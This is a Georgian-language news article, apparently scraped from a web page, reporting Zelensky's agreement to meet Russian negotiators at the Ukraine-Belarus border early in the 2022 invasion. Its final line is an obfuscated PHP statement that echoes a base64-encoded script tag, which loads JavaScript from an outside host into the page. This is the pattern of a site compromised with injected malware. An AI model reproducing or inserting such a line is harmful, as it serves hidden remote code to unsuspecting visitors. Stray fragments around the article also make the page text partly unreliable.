celsiusi
ავერსი შნაიდერი
უკრაინის პრეზიდენტი, ვოლოდიმირ ზელენსკი ამბობს, რომ უკრაინა თანახმაა რუსეთს ბელარუსის საზღვართან ახლოს შეხვდეს და ესაუბროს.
 
ეს გადაწყვეტილება მან ბელარუსის პრეზიდენტთან, ალექსანდრ ლუკაშენკოსთან საუბრის შემდეგ მიიღო.
 
„ჩვენ შევთანხმდით, რომ უკრაინის დელეგაცია შეხვდება რუსებს წინასწარი პირობების გარეშე უკრაინა-ბელარუსის საზღვარზე, მდინარე პრიპიატის მახლობლად.
 
ალექსანდრ ლუკაშენკომ აიღო თავის თავზე პასუხისმგებლობა, რომ როგორც გამგზავრების, ასევე მოლაპარაკებისა და უკრაინული დელეგაციის უკან დაბრუნების დროს – ყველა თვითმფრინავი, ვერტმფრენი და რაკეტა, რომელიც ბელარუსის ტერიტორიაზეა განთავსებული, მიწაზე დარჩება,“ – წერს ზელენსკი.
 
კრემლმა დღეს განაცხადა, რომ რუსეთი მზადაა მოლაპარაკებისთვის და უკრაინელებს ბელარუსში, ქალაქ გომელში ელოდება. ამ განცხადებას მალევე უპასუხა ვოლოდიმირ ზელენსკიმ. პრეზიდენტი ამბობს, რომ სასაუბროდ უკრაინა მინსკში არ ჩავა.
 
„ჩვენ რა თქმა უნდა, გვინდა მშვიდობა, ჩვენ გვინდა შეხვედრები, გვინდა ომის დასრულება. ვარშავა, ბრატისლავა, ბუდაპეშტი, სტამბული, ბაქო – ყველა ეს ქალაქი ჩვენ შევთავაზეთ რუსეთს. და ისეც, ნებისმიერი ქალაქი გვაწყობს, ნებისმიერი ტერიტორია, საიდანაც რაკეტები არ დაფრინავენ. მხოლოდ ასე შეიძლება სამართლიანი მოლაპარაკებების წარმოება. და მხოლოდ ასე შეიძლება ომის დასრულება,“.
 
ზელენსკი ბელარუსში მოლაპარაკებებზე უარს ამბობს – მიმართვა ბელარუსებს
 
მე-4 დღეა, რუსეთი უკრაინის წინააღმდეგ სრულმასშტაბიან ომს აწარმოებს. რუსული ჯარები უკრაინაში შეიჭრნენ სამი მხრიდან — ჩრდილოეთიდან (ბელარუსი), აღმოსავლეთიდან (დონეცკი-ლუგანსკი) და სამხრეთიდან (ყირიმი).
 
უკრაინული მხარის უახლესი ცნობის თანახმად, ომის პირველი სამი დღის განმავლობაში გაანადგურეს მოწინააღმდეგის 27 თვითმფრინავი, 26 ვერტმფრენი, 146 ტანკი და 706 საბრძოლო მანქანა.
653
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");